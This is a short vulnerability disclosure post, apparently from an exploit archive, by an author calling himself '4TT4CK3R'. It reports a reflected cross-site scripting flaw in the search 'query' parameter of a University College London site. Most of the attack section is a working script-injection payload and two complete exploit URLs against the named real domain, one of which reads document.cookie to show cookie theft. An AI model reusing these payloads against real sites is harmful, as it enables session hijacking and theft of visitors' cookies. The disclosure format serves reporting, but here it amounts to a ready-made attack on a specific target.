London's Global University Cross-Site-Scripting Vulnerability

2017-04-21 / 2017-04-22
ir 4TT4CK3R (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-------------------------- In the name of god -------------------------- Exploit Title : ------------------- London's Global University Cross-Site-Scripting Vulnerability Exploit Author : --------------------- 4TT4CK3R Date : ---------- 2017/Apr/21 HomePage : ------------------ https://www.ucl.ac.uk Vendor Page : --------------------- https://www.ucl.ac.uk/maps/index.php Parameter Name : -------------------------- query Description : ------------------ Our Script is : ""/>"certi"<script>alert("4TT4CK3R")</script>"/certi" ok. Now we can insert this script for query parameter. we will have : http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(%224TT4CK3R%22)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go and you can get cookies : http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go ok this university have a Cross-site-Scripting vulnerability! ScreenShot : ------------------ http://uupload.ir/files/hxyn_1-1.png http://uupload.ir/files/ufgl_2-2.png Discovered and Exploited By: ---------------------------------------- 4TT4CK3R

References:

http://uupload.ir/files/hxyn_1-1.png
http://uupload.ir/files/ufgl_2-2.png


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top